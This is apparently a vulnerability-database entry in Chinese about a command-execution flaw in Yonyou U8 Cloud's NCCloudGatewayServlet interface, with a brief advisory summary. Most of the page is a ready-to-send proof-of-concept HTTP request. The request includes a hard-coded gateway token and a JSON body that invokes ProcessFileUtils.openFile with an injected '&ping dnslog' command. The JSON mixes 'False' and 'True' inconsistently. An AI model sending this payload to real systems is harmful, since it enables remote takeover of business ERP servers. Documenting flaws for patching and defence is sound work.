用友 U8 Cloud NCCloudGatewayServlet 命令执行漏洞

日期: 2025-09-24 19:44:23 | 影响软件: 用友U8 Cloud | POC: 已公开

漏洞描述

U8 cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。 2025年9月24日,用友安全中心发布关于U8cloud所有版本NCCloudGatewayServlet接口存在命令执行漏洞的安全公告。攻击者通过易受攻击的代码,达到命令执行的效果,导致系统被攻击与控制。建议受影响的用户及时更新补丁进行修复。

PoC代码

POST /service/NCCloudGatewayServlet HTTP/1.1
Content-Type: application/json
Host: 
Gatewaytoken: TJ6RT-3FVCB-DPYP8-XF7QM-96FV3

{
    "accountCode": "U8cloud",
    "groupCode": "123",
    "user": "admin",
    "serviceInfo": {
        "serviceClassName": "com.ufida.zior.console.IActionInvokeService",
        "serviceMethodName": "exec",
        "serviceMethodArgInfo": [
            {
                "argType": {
                    "body": "java.lang.String"
                },
                "argValue": {
                    "body": "nc.bs.pub.util.ProcessFileUtils"
                },
                "agg": False,
                "isArray": False,
                "isPrimitive": true
            },
            {
                "argType": {
                    "body": "java.lang.String"
                },
                "argValue": {
                    "body": "openFile"
                },
                "agg": False,
                "isArray": False,
                "isPrimitive": true
            },
            {
                "argType": {
                    "body": "java.lang.String"
                },
                "argValue": {
                    "body": "webapps\\u8c_web\\app.html\"&ping dnslog"
                },
                "agg": False,
                "isArray": False,
                "isPrimitive": True
            }
        ]
    }
}

相关漏洞推荐